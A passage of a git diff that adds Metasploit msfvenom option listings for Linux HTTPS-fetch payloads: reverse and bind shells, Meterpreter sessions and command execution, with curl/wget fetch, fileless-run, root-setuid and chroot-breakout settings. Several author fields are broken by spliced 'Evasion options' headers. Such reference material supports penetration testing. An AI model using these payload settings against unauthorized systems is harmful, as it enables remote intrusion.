setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_find_port.txt new file mode 100644 index 0000000..42099b7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_find_port.txt @@ -0,0 +1,82 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/https/ppc64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 34194 no The local client port +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dhvwldDCj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTPS server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_reverse_tcp.txt new file mode 100644 index 0000000..9c2870c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_reverse_tcp.txt @@ -0,0 +1,90 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/ppc64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vMuOhwKQFM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_http.txt new file mode 100644 index 0000000..d70d2a9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_http.txt @@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc64le/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/ppc64le/meterpreter_reverse_http: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NNtHJhAv no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_https.txt new file mode 100644 index 0000000..51f116f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_https.txt @@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc64le/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/https/ppc64le/meterpreter_reverse_https: +========================= + +pid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME alVfIAdAF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..bbefdf0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64le-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME oTeBkoZeOXsG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-exec.txt b/msfvenom/payload_options/cmd-linux-https-x64-exec.txt new file mode 100644 index 0000000..c14837c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-exec.txt @@ -0,0 +1,76 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/x64/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + ricky + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ksIYQDjPEh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..bef13f9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-bind_tcp.txt @@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Bind TCP Stager + Module: payload/cmd/linux/https/x64/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 110 + +Evasion options for payload/cmd/linux/https/x64/meterpreter/bind_tcp: +========================= + +options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be 